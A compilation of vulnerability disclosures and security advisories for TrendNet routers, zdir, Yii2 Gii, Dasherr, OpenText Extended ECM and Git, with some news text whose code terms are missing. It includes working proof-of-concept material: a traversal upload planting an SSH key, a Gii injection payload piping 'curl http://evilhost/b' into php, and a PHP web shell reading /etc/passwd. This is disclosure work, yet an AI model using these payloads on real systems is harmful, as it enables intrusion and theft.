** UNSUPPORTED WHEN ASSIGNED ** TrendNet Wireless AC Easy-Upgrader TEW-820AP v1.0R, firmware version 1.01.B01 was discovered to contain a stack overflow via the newpass parameter at /formPasswordSetup. This vulnerability allows attackers to execute arbitrary code via a crafted payload. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Permalink

Cannot retrieve contributors at this time

**Overview**

Vendor of the products: TRENDNet (https://www.trendnet.com/)

Reported by: johnawm of HIT-IDS ChunkL Team

Product: TRENDNet TEW-820AP (Version v1.0R)

Affected Version: TRENDNet TEW-820AP 1.01.B01

Firmware: https://downloads.trendnet.com/tew-820ap/firmware/tew-820apv1\_(fw1.01b01).zip

**Vulnerability Details**

A stack overflow vulnerability exists in TrendNet Wireless AC Easy-Upgrader TEW-820AP (Version v1.0R, firmware version 1.01.B01) which may result in remote code execution or denial of service. The issue exists in the binary "boa" which resides in "/bin" folder, and the binary is responsible for serving http connection received by the device. While processing the post reuqest "/boafrm/formPasswordSetup", the value of "newpass" parameter (as shown at line 18 of Figure A) which could be arbitrarily long. The value of this parameter is copied into MIB database with key 183 by “apmib\_set” function (as shown at line 143 of Figure B) which could lead to a buffer overflow when it is read and used again.

Figure A: The decompiled code of function which read value of parameter "newpass".

Figure B: The decompiled code of function which copy value to MIB database.

**Reproduce and POC**

To reproduce the vulnerability, the following steps can be followed:

1.  Start frimware through QEMU system or other methods (real device)
2.  Use the default username and password to login web.
3.  Execute the poc script as follows:

python3 POC\_for\_formWizardPassword.py 192.168.1.1

**Reply by Official**

The official TRENDNet has replied on official web site https://www.trendnet.com/support/view.asp?cat=4&id=87

CVE-2023-24096: cve/README.md at master · chunklhit/cve

** UNSUPPORTED WHEN ASSIGNED ** TrendNet Wireless AC Easy-Upgrader TEW-820AP v1.0R, firmware version 1.01.B01 was discovered to contain a stack overflow via the submit-url parameter at /formSystemCheck. This vulnerability allows attackers to execute arbitrary code via a crafted payload. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

**Overview**

Vendor of the products: TRENDNet (https://www.trendnet.com/)

Reported by: johnawm of HIT-IDS ChunkL Team

Product: TRENDNet TEW-820AP (Version v1.0R)

Affected Version: TRENDNet TEW-820AP 1.01.B01

Firmware: https://downloads.trendnet.com/tew-820ap/firmware/tew-820apv1\_(fw1.01b01).zip

**Vulnerability Details**

A stack overflow vulnerability exists in TrendNet Wireless AC Easy-Upgrader TEW-820AP (Version v1.0R, firmware version 1.01.B01) which may result in remote code execution or denial of service. The issue exists in the binary "boa" which resides in "/bin" folder, and the binary is responsible for serving http connection received by the device. While processing the post reuqest "/boafrm/formSystemCheck", the value of "submit-url" parameter (as shown at line 33-35 of Figure A) which can be arbitrarily long is copied onto stack memory by "sprintf" function (as shown at line 20 of Figure B), and could lead to a buffer overflow. The attackers can construct a payload to carry out arbitrary code attacks.

Figure A: The decompiled code of function which read value of parameter "submit-url" and call send\_redirect\_perm function with the value as a parameter.

Figure B: The decompiled code of function send\_redirect\_perm.

**Reproduce and POC**

To reproduce the vulnerability, the following steps can be followed:

1.  Start frimware through QEMU system or other methods (real device)
2.  Use the default username and password to login web.
3.  Execute the poc script as follows:

python3 POC\_for\_formWizardPassword.py 192.168.1.1

**Reply by Official**

The official TRENDNet has replied on official web site https://www.trendnet.com/support/view.asp?cat=4&id=87

CVE-2023-24095: cve/README.md at master · chunklhit/cve

An arbitrary file upload vulnerability in the /api/upload component of zdir v3.2.0 allows attackers to execute arbitrary code via a crafted .ssh file.

**The steps to reproduce.**

zdir version: 3.2.0

    git clone https://github.com/helloxz/zdir
    
    go run main.go init
    
    

modify file: /zdir/data/config/config.ini

start

View routes, the interface requires login credentials  

Enter the controller.Mkdir method, the parameters submitted by the post request are name and path  

Enter the !V\_dir method and find that it is only to judge whether the passed path is a folder

This creates a .ssh directory using directory traversal

    POST /api/dir/create HTTP/1.1
    Host: 127.0.0.1:6080
    Content-Length: 28
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
    X-Token: 433a01baeaa6c37ef46f21621cc06f95
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;charset=UTF-8
    Accept: application/json, text/plain, */*
    X-Cid: bPlNFG
    sec-ch-ua-platform: "Linux"
    Origin: http://127.0.0.1:6080
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:6080/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
    Connection: close
    
    path=/../../../../&name=.ssh
    

Enter the controller.Upload method, you can specify the upload path  

There is a loophole in the regex to determine whether the path is legal, and you can use /../ to bypass it

Determine whether the folder exists, and terminate execution if it does not exist. So use the above directory traversal to create a folder, and then upload the file name without renaming it.  

    POST /api/upload HTTP/1.1
    Host: 127.0.0.1:6080
    Content-Length: 897
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqjo68lEJ6LlJ8zdA
    X-Token: 433a01baeaa6c37ef46f21621cc06f95
    X-Cid: bPlNFG
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    sec-ch-ua-platform: "Linux"
    Accept: */*
    Origin: http://127.0.0.1:6080
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1:6080/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
    Connection: close
    
    ------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
    Content-Disposition: form-data; name="path"
    
    /../../../../../../home/kali/.ssh
    ------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
    Content-Disposition: form-data; name="file"; filename="authorized_keys"
    Content-Type: text/plain
    
    ssh-rsa
    
    ------WebKitFormBoundaryqjo68lEJ6LlJ8zdA--
    

Generate an ssh public key for upload  

Then you can use ssh to connect to the server

CVE-2023-23314: File upload ssh authorized_keys causes RCE · Issue #90 · helloxz/zdir

Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023.

Something went wrong, but don’t fret — let’s give it another shot.

CVE-2023-24059

Yii Yii2 Gii before 2.2.2 allows remote attackers to execute arbitrary code via the Generator.php messageCategory field. The attacker can embed arbitrary PHP code into the model file.

This article is written specifically for web developers who use a module. We will tell you how we got access to sensitive data on a staging server through Yii2 Gii Remote Code: First to the testing environment, and then to the production. Spoiler: We have notified the module developer about the problem and it will be fixed soon. A temporary patch is available on GitHub.

Gii is a module used to automatically generate code that implements some common website features: https://yiiframework.com.ua/ru/doc/guide/2/start-gii/

Let’s get started.

The packages we use: 

"yiisoft/yii2-debug": "~2.1.0",
       "yiisoft/yii2-gii": "^2.2",
       "yiisoft/yii2-faker": "~2.0.0",

Yii2 Framework **2.0.35**

You can find Gii at the addresses like:

http://localhost/index.php?r=gii%2Fdefault%2Findex
http://localhost/gii/

To successfully exploit the vulnerability, go to the **Model Generator** section.

The application must have a database configured, otherwise the model cannot be generated. 

Also, you must specify the existing table name in the **Table Name** field. 

The remaining fields can be filled arbitrarily up to the **Enable I18N** checkbox.

Once you select it, the **Message Category** field appears.

That’s exactly where the vulnerability is hidden:

aaa', 'a'),\];}}system('curl http://evilhost/b|php');\_\_halt\_compiler();

Click **Preview**, then click **Generate**. The answer should be:

The code has been generated successfully.

And next there will be data on successful generation, including a path to the model.

The vulnerability exists due to insufficient filtering of incoming parameters in the generateString function of the **yiisoft/yii2-gii/src/Generator.php#L505** file. The $ this->messageCategory parameter is not filtered and allows you to embed arbitrary php code into the model file.

Here is an example file with embedded php code:

To execute arbitrary code, you need to enter the created model it in the **Model Class** field of the **Form Generator** section. This vulnerability can be exploited in any type of code generation with the **Enable I18N** option available.

Since the vulnerability still exists, those who use the Yii2 Gii Remote Code module need to check the following:

1.  Make sure that access to the developer’s platform is closed: There should be no alpha/beta or other versions, and the development environment should not be open to external access.
2.  To patch the vulnerability, you should use the recommendations described by the module´s developer here https://github.com/yiisoft/yii2-gii/issues/433.
3.  Furthermore, we encourage you to install the Web Application Firewall which will fix such vulnerabilities and ensure the security of your web applications.

We would also like to note that developers should not underestimate access to their staging server, as it can help attackers gain access to their resources.

Start your Wallarm WAF trial for free today: sales@wallarm.ru

CVE-2020-36655: Yii2 Gii Remote Code Execution

erohtar/Dasherr is a dashboard for self-hosted services. In affected versions unrestricted file upload allows any unauthenticated user to execute arbitrary code on the server. The file /www/include/filesave.php allows for any file to uploaded to anywhere. If an attacker uploads a php file they can execute code on the server. This issue has been addressed in version 1.05.00. Users are advised to upgrade. There are no known workarounds for this issue.

**Summary**

Unrestricted file upload allows any unauthenticated user to execute arbitrary code on the server.

**Details**

/www/include/filesave.php allows for any file to uploaded to anywhere. If an attacker uploads a php file they can execute code on the server.  
https://cwe.mitre.org/data/definitions/434.html

**PoC**

Using default configuration, intercept the POST request used to save the settings in Burp Suite.

Rename the file to ../shell.php

Replace the data to the following:

    <?php
    echo "Beaux was here ";
    system($_REQUEST['cmd']);
    ?> 
    

in a browser go to

http://x.x.x.x/shell.php?cmd=cat%20/etc/passwd

Here is a video demo:  
https://youtu.be/FEXuw5GJW-Y

A full reverse shell would also work:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

**Impact**

Remote code execution allows an unauthenticated attacker to run arbitrary code on the server.

CVE-2023-23607: Unrestricted file upload leads to Remote Code Execution

OpenText Extended ECM versions 16.2.2 through 22.3 suffer from arbitrary file deletion, information disclosure, local file inclusion, and privilege escalation vulnerabilities.

OpenText Extended ECM 22.3 File Deletion / LFI / Privilege Escsalation

OpenText Extended ECM versions 20.4 through 22.3 suffer from a pre-authentication remote code execution vulnerability in the Java frontend.

SEC Consult Vulnerability Lab Security Advisory < 20230117-1 >=======================================================================               title: Pre-authenticated Remote Code Execution via Java frontend                      and QDS endpoint             product: OpenText™ Content Server component of OpenText™ Extended ECM  vulnerable version: 20.4 - 22.3       fixed version: 22.4          CVE number: CVE-2022-45927              impact: Critical            homepage: https://www.opentext.com               found: 2022-09-16                  by: Armin Stock (Atos)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Atos company                      Europe | Asia | North America                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"OpenText™ Extended ECM is an enterprise CMS platform that securely governs theinformation lifecycle by integrating with leading enterprise applications, suchas SAP®, Microsoft® 365, Salesforce and SAP SuccessFactors®. Bringing contentand processes together, Extended ECM provides access to information when andwhere it’s needed, improves decision-making and drives operational effectiveness."Source: https://www.opentext.com/products/extended-ecmBusiness recommendation:------------------------The vendor provides a patch which should be installed immediately.Vulnerability overview/description:-----------------------------------1) Pre-authenticated Remote Code Execution via Java frontend and QDS endpoint (CVE-2022-45927)The `QDS` endpoints of the `Content Server` are not protected by the normaluser management functionality of the `Content Server`, but check the value ofthe key `_REQUEST` of the incoming data. Normally this parameter is set by theHTTP frontend (e.g. the `CGI` binary `cs.exe` or `Java` application servlet) to`llweb`.There is a bug in the `Java` application server, found in`%OT_BASE%/application/cs.war`, which allows an attacker to actually set thevalue of the key `_REQUEST` to an arbitrary value and bypass the authorizationchecks.Most of the endpoints cannot be called, because they require specific data typesof the incoming data, which can not be controlled by the attacker. Only stringsare supported. But a few endpoints can be called which allow an attacker to createfiles or execute arbitrary code on the server.Proof of concept:-----------------1) Pre-authenticated Remote Code Execution via Java frontend and QDS endpoint (CVE-2022-45927)To be able to set the value of the `_REQUEST` parameter the attacker has tosend the data via a `POST` request with a `Content-Type` of `multipart/form-data`.This results in the following execution flow:-------------------------------------------------------------------------------[ Details removed, will be published at a later date ]-------------------------------------------------------------------------------The following request (using the `CGI` frontend) results in an unauthorizedresponse:-------------------------------------------------------------------------------[ PoC removed, will be published at a later date ]--------------------------------------------------------------------------------------------------------------------------------------------------------------<div class="cs-form-container cs-form-message-container">   <div>     <div class="cs-form-line-text cs-form-message cs-form-message-error" title="Error" id="errMsg" >       <p>         Content Server Error:       </p>       <p>         The request did not come from XXX.       </p>     </div>   </div></div>-------------------------------------------------------------------------------Whereas using the `Java` application server results in the following response:-------------------------------------------------------------------------------HTTP/1.1 200A<1,?,'ErrMsg'=?,'ErrMsgDetail'=?,'OK'=true,'QDSServerList'={}>Content-Type: text/html;charset=UTF-8Cache-Control: no-cacheX-Frame-Options: SAMEORIGINContent-Security-Policy: frame-ancestors 'self'X-UA-Compatible: IE=edgeContent-Length: 0Date: Tue, 27 Sep 2022 13:04:47 GMTConnection: close-------------------------------------------------------------------------------Create new objects:Using this bug it is possible to create objects in the `Content Server` withoutknown credentials and in the context of the super-admin user ( ID `1000` ), bycalling the endpoint `[ Details removed, will be published at a later date ]`.-------------------------------------------------------------------------------[ PoC removed, will be published at a later date ]-------------------------------------------------------------------------------The new object (subType = `145` text file) is created without providing cookiesand the `owner` attribute of this object is set to `1000` (super admin):-------------------------------------------------------------------------------HTTP/1.1 200A<1,?,'CATEGORY'=?,'CloneTime'=D/2022/9/28: 8:10:5,'COMMENT'='created','ContentType'=?,'CREATEDATE'=D/2022/9/28:8:10:5,'CREATEDBY'=1000,'DataID'=51982,'DATELASTMODIFY'=D/2022/9/28:8:10:5,'EXATT1'=?,'EXATT2'=?,'EXTENDEDDATA'=?,'GROUPPERM'=128,'location'=E648871951,'MAJOR'=?,'MAXVERSION'=-1,'MINOR'=?,'Name'='qds-create-poc.txt','nextURL'=E648871951,'Node'=A<1,?,'AssignedTo'=?,'CacheExpiration'=0,'Catalog'=0,'ChildCount'=0,'CreateDate'=D/2022/9/28:8:10:5,'CreatedBy'=1000,'DataID'=51982,'DataType'=?,'DateAssigned'=?,'DateCompleted'=?,'DateDue'=?,'DateEffective'=?,'DateExpiration'=?,'DateStarted'=?,'DCategory'=?,'DComment'='created','Deleted'=0,'ExAtt1'=?,'ExAtt2'=?,'ExtendedData'=?,'ExternalCreateDate'=?,'ExternalCreatorID'=?,'ExternalModifyDate'=?,'ExternalSourceID'=?,'GIF'=?,'GPermissions'=128,'GroupID'=999,'GUID'='@[537A1229-E0F5-45EE-A3F2-D7F91EE6CBBC]','Major'=?,'MaxVers'=-1,'Minor'=?,'ModifiedBy'=1000,'ModifyDate'=D/2022/9/28:8:10:5,'Multilingual'=V{<'LanguageCode','Name','DComment'><'de','qds-create-poc.txt','created'>},'Name'='qds-create-poc.txt','Ordering'=?,'OriginDataID'=0,'OriginOwnerID'=0,'OwnerID'=-2004,'ParentID'=2004,'PermID'=?,'Priority'=?,'ReleaseRef'=?,'Reserved'=0,'ReservedBy'=0,'ReservedDate'=?,'SPermissions'=16777215,'Status'=?,'SubType'=144,'UPermissions'=16777215,'UserID'=1000,'VersionNum'=1,'WPermissions'=128>,'OK'=true,'ORDERING'=?,'ORIGINALID'=0,'ORIGINALVOLID'=0,'PARENTID'=2004,'PERMISSIONS'=-2130706433,'PermsOK'=true,'Public'=false,'RELEASEREF'=?,'RESERVED'=0,'RESERVEDBY'=0,'RESERVEDDATE'=?,'SUBTYPE'=144,'SYSTEMPERM'=16777215,'USERID'=1000,'USERPERM'=16777215,'VERSION'=A<1,?,'DataSize'=6,'DocID'=51982,'ExternalCreateDate'=?,'ExternalCreatorID'=?,'ExternalModifyDate'=?,'ExternalSourceID'=?,'FileCDate'=D/2022/9/28:8:10:5,'FileCreator'=?,'FileMDate'=D/2022/9/28:8:10:5,'FileName'='qds-create-poc.txt','FileType'='html','GUID'='@[DF09D9F7-6A86-40CB-AECD-57FD5FB7D38B]','Indexed'=0,'Locked'=0,'LockedBy'=?,'LockedDate'=?,'MimeType'='text/html','Owner'=1000,'PageNum'=?,'Platform'=0,'ProviderId'=51982,'ProviderName'='SQL','ResSize'=0,'VerCDate'=D/2022/9/28:8:10:5,'VerComment'=?,'VerMajor'=0,'VerMDate'=D/2022/9/28:8:10:5,'VerMinor'=1,'Version'=1,'VersionID'=51982,'VersionName'='1','VerType'=?>,'versionInfo'=A<1,?,'COMMENT'=?,'CREATEDATE'=D/2022/9/28:8:10:5,'FILECREATEDATE'=D/2022/9/28:8:10:5,'FILECREATOR'=?,'FILEDATASIZE'=6,'FILEMODIFYDATE'=D/2022/9/28:8:10:5,'FILENAME'='qds-create-poc.txt','FILEPLATFORM'=0,'FILERESSIZE'=0,'FILETYPE'='html','ID'=51982,'INDEXED'=0,'LOCKED'=0,'LOCKEDBY'=?,'LOCKEDDATE'=?,'MIMETYPE'='text/html','MODIFYDATE'=D/2022/9/28:8:10:5,'NAME'='1','NODEID'=51982,'NUMBER'=1,'OWNER'=1000,'PROVIDERID'=51982,'PROVIDERNAME'='SQL','TYPE'=?>,'VOLUMEID'=-2004,'WORLDPERM'=128>Content-Type: text/html;charset=UTF-8Cache-Control: no-cacheX-Frame-Options: SAMEORIGINContent-Security-Policy: frame-ancestors 'self'X-UA-Compatible: IE=edgeContent-Length: 0Date: Wed, 28 Sep 2022 08:10:05 GMTConnection: close-------------------------------------------------------------------------------There is a process object (`typeId` = 271), which can be created and executedafterwards allowing attackers to execute arbitrary code.Vulnerable / tested versions:-----------------------------The following version has been tested:* 22.1 (16.2.19.1803)The following versions are vulnerable according to the vendor:* 20.4 - 22.3Vendor contact timeline:------------------------2022-10-07: Vendor contacted via security@opentext.com2022-10-07: Vendor acknowledged the email and is reviewing the reports2022-11-18: Vendor confirms all vulnerabilities and is working on a patch aimed to             be released in November2022-11-24: Vendor delays the patch "few days/weeks into December"2022-11-25: Requesting CVE numbers (Mitre)2022-12-15: Vendor delays the patch and provides a release date: January 16th 20232023-01-17: Public release of security advisorySolution:---------Upgrade to at least version 22.4 or apply hotfixes which can be downloaded atthe vendor's page:https://support.opentext.com/csm?id=kb_article_view&sysparm_article=KB0781429Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC Consult, an Atos companyEurope | Asia | North AmericaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anAtos company. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: http://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF Armin Stock / @2023

OpenText Extended ECM 22.3 Java Frontend Remote Code Execution

OpenText Extended ECM versions 20.4 through 22.3 suffer from a pre-authentication remote code execution vulnerability in cs.exe.

SEC Consult Vulnerability Lab Security Advisory < 20230117-0 >  
=======================================================================  
               title: Pre-authenticated Remote Code Execution in cs.exe  
             product: OpenText™ Content Server component of OpenText™ Extended ECM  
  vulnerable version: 20.4 - 22.3  
       fixed version: 22.4  
          CVE number: CVE-2022-45923  
              impact: Critical  
            homepage: https://www.opentext.com/  
               found: 2022-09-16  
                  by: Armin Stock (Atos)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"OpenText™ Extended ECM is an enterprise CMS platform that securely governs the  
information lifecycle by integrating with leading enterprise applications, such  
as SAP®, Microsoft® 365, Salesforce and SAP SuccessFactors®. Bringing content  
and processes together, Extended ECM provides access to information when and  
where it’s needed, improves decision-making and drives operational effectiveness."

Source: https://www.opentext.com/products/extended-ecm

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

Vulnerability overview/description:  
-----------------------------------  
1) Pre-authenticated Remote Code Execution in cs.exe (CVE-2022-45923)  
The `Common Gateway Interface (CGI)` program `cs.exe` of the `Content Server`  
has a vulnerability, which allows an attacker to increase/decrease an arbitrary  
memory address by 1 and to trigger a call to a method of a `vftable` with a  
`vftable pointer` value chosen by the attacker.

The `cs.exe` does de-serialize (crack) the user provided data in the `_fInArgs`  
parameter, if the parameter `_ApiName` is set. During this de-serialization to  
a `class KOSValue` object, the function `obj_ref_cracker` can be called. This  
function tries to create a new `class KOSValue` object with an unknown class ID  
of `3`.

As the class ID is unknown the function returns an object of type  
`KOSValueBaseClass` instead of `KOSObjRefClass`, but the value of the  
`class_ptr` attribute of the new `class KOSValue` object is controlled by the  
attacker. This new object can then be used to increase/decrease arbitrary  
memory addresses and call methods of its `vftable` via the functions  
`KOSValueBaseClass::AddReference` and `KOSValueBaseClass::ReleaseReference`.

Proof of concept:  
-----------------  
1) Pre-authenticated Remote Code Execution in cs.exe (CVE-2022-45923)  
The following request crashes the `CGI` binary `cs.exe` with an `access  
violation exception - 0xC0000005` trying to read memory from address  
`0xAAAA+8`:

-------------------------------------------------------------------------------  
[ PoC removed, will be published at a later date ]  
-------------------------------------------------------------------------------

There are `.dll` files (`libaprutil-1` & `libapriconv-1.dll`) which are not  
compiled with the security flag `Address Space Layout Randomization - ASLR`  
enabled, which can be used to achieve remote code execution.

-------------------------------------------------------------------------------  
.\winchecksec.exe --json (get-item C:\OPENTEXT-22\cgi\*.dll) > .\checksec-results.json  
-------------------------------------------------------------------------------

-------------------------------------------------------------------------------  
cat checksec-results.json | jq -r '.[] | [.path, .mitigations.aslr.presence] | @csv'

"icudt69.dll","Present"  
"icuin69.dll","Present"  
"icuio69.dll","Present"  
"icutu69.dll","Present"  
"icuuc69.dll","Present"  
"jsoncpp.dll","Present"  
"libapr-1.dll","Present"  
"libapriconv-1.dll","NotPresent"  
"libaprutil-1.dll","NotPresent"  
"libcrypto-1_1-x64.dll","Present"  
"libexpat.dll","Present"  
"libssl-1_1-x64.dll","Present"  
"llcrypt.dll","Present"  
"llisapi.dll","Present"  
"llkernel.dll","Present"  
"llresources.dll","Present"  
"log4cxx.dll","Present"  
"PocoFoundation.dll","Present"  
-------------------------------------------------------------------------------

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested:  
* 22.1 (16.2.19.1803)

The following versions are vulnerable according to the vendor:  
* 20.4 - 22.3

Vendor contact timeline:  
------------------------  
2022-10-07: Vendor contacted via security@opentext.com  
2022-10-07: Vendor acknowledged the email and is reviewing the reports  
2022-11-18: Vendor confirms all vulnerabilities and is working on a patch aimed to  
             be released in November  
2022-11-24: Vendor delays the patch "few days/weeks into December"  
2022-11-25: Requesting CVE numbers (Mitre)  
2022-12-15: Vendor delays the patch and provides a release date: January 16th 2023  
2023-01-17: Public release of security advisory

Solution:  
---------  
Upgrade to at least version 22.4 or apply hotfixes which can be downloaded at  
the vendor's page:  
https://support.opentext.com/csm?id=kb_article_view&sysparm_article=KB0781429

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Armin Stock / @2023

OpenText Extended ECM 22.3 cs.exe Remote Code Execution

Uncovered vulnerabilities include several high, medium, and low-security issues

Uncovered vulnerabilities include several high, medium, and low-security issues

  

A security audit of the source code for Git has revealed several vulnerabilities, including two critical overflow bugs.

The audit, sponsored by the Open Source Technology Improvement Fund (OSTIF) and performed by X41 D-Sec and GitLab, also included several high, medium, and low-severity issues.

Given the popularity of Git and its integration into popular packaging systems, the vulnerabilities could have an immense impact on the security of the software supply chain.

**Evil clone operation**

The most severe flaw the researchers discovered was a memory corruption bug that could be triggered when Git parses the file of a repository. Developers use to customize how Git handles different files and file paths in repositories, such as line endings, file encodings, and more.

The researchers discovered that if contained a very long attribute line or many attribute lines, it would cause a counter overflow in the function that parses the file and lead to arbitrary code execution.

LIKE THE DAILY SWIG? Tell us what you think for the chance to win Burp Suite swag

An attacker could exploit the bug by committing a malicious file to a repository. The bug would be triggered when the victim called or on the repository.

Since the bug requires no special arguments or commands on the victim’s computer, it could become an important part of dangerous supply chain attacks.

“If \[attackers\] could stage it on a popular library, they could have an impact on the git clients using it, which might also involve anyone using common package systems to install software,” Markus Vervier, managing director at X41 D-Sec, told The Daily Swig.

The bug could also be used to exploit the Git servers such as GitHub or GitLab, Vervier said – though he added that both GitLab and GitHub itself have already been patched.

**Pretty but malicious**

The second critical bug the researchers discovered would allow code execution during archive operations commonly performed by Git forges such as GitHub and GitLab.

The and commands can display commits using pretty formatting. When processing the padding operators, an integer overflow can occur in the pretty format parser if a special format specifier pattern is used.

The overflow bug is triggered directly if a user runs the command with the specifier, or indirectly if the command is called via the mechanism.

Read more of the latest news about DevSecOps

An attacker could trigger the bug through an argument injection to the command, confirmed GitLab security engineer Joern Schneeweisz in comments to The Daily Swig. But the more interesting attack vector was the operation, he said.

The attacker could include an statement in the file within a repository. It would trigger the bug by a command without the need for any injected arguments, Schneeweisz said.

“The payload would be self-contained within the repository and triggered by calling ,” Schneeweisz said. “Running on arbitrary repositories is a very common thing for Git forges like GitLab or GitHub, so this issue is mostly an RCE \[remote code execution\] threat to those.”

**The supply chain threat**

In addition to the critical vulnerabilities, the researchers found many integer-related issues that could lead to denial-of-service, out-of-bound reads, or simply badly handled corner cases on large input. Vervier said that the findings were very relevant to the security of software supply chains.

“Git is basically the ultimate supply chain attack vector in the current IT landscape since it is heavily used even for package managers such as Rust/Cargo, Golang, NodeJS, and others. It is also the most widely used source code versioning tool for development,” he said.

RECOMMENDED READING Squaring the CircleCI: DevOps platform publishes post-mortem on recent breach

Tag

#rce